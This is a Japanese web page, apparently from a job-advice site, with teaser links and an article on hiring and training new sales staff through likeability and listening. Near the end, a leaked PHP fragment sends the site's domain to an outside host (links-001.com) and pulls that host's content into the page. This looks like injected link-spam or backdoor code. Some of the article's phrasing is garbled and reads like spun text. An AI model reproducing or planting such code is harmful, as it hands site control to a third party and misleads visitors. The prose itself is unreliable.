前へ
次へ

営業求人で転職者は何を最重要課題とするか

営業求人では、一匹狼として行動する営業マンより、チーム・組織として行動できる営業マンが求められている

more

自分に合った営業求人を探しやすい転職サイト

雑誌などを使って仕事探しをする方もいますが、それ以外にも効果的な方法が存在します。
オンラインサービス

more

営業求人の転職で知らなければならないこと

営業求人の転職をする場合には、最低限知っておきたいことがあります。
それは面接対策を十分に行うことでし

more

転職者を営業求人した後に成功させるコツは

転職を考え営業求人を見て募集して来る人は、とりあえずよほど問題がない限り採用しておくのがよいでしょう。
転職をする人の中でも、営業に対して腕前がよい人はそれほどいません。
これは、本格的に営業能力の高い人はたいてい引き抜きをされてしまい営業求人の方には回ってこないからです。
そこで、人を育てることを考えておく必要があります。
少なくとも、人を育てることを行えば、人並み以上の能力の高い営業マンを育成することは可能だからです。
営業マンになる時に重要なことを事前に教えておけば、それだけで能力の高い営業マンは自然と育ってきます。
もちろんすべての人が良い結果を出す訳ではありませんが、今まで営業をしたことがなかった人でも才能が開花するかもしれません。
このとき何を教えたらよいかといえば、まず人柄の良さを教えておきましょう。
当然、作用するときもその人柄をよく見ておく必要があります。
人柄がよければ、とりあえず営業行為では間違いなく有利になります。
人柄を営業マンに認識させるためには、その営業マンの嫌いなタイプを紙に書いていくことです。
例えば、嘘をつく人やその場の空気を読まない人などが嫌いだとすれば、それを逐一かかせるようにします。
そして書いた結果一覧表ができるわけですが、その一覧表の逆の人間にさせれば好かれるタイプの出来上がりです。
さきほどの例で言えば、嘘をつく人が嫌いならば嘘をつかない人になればよいわけです。
あるいは場の空気を読むことができない人が嫌いならば、場の空気を読むことができる人になれば人から好かれるといってよいでしょう。
このように、いくつかの条件を出させそれを一つ一つ実行させることからスタートしてみましょう。
それ以外では、相手の話しを聞くことも重要になります。
相手の話しをさせるときには、可能な限り不満を紛失させるようにしましょう。
相手がどのような不満を持っているのかを明確にすることで、それに対して解決策を図るのが営業マンの仕事です。
これを退職した際に採用される営業マンに教え込むことです。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top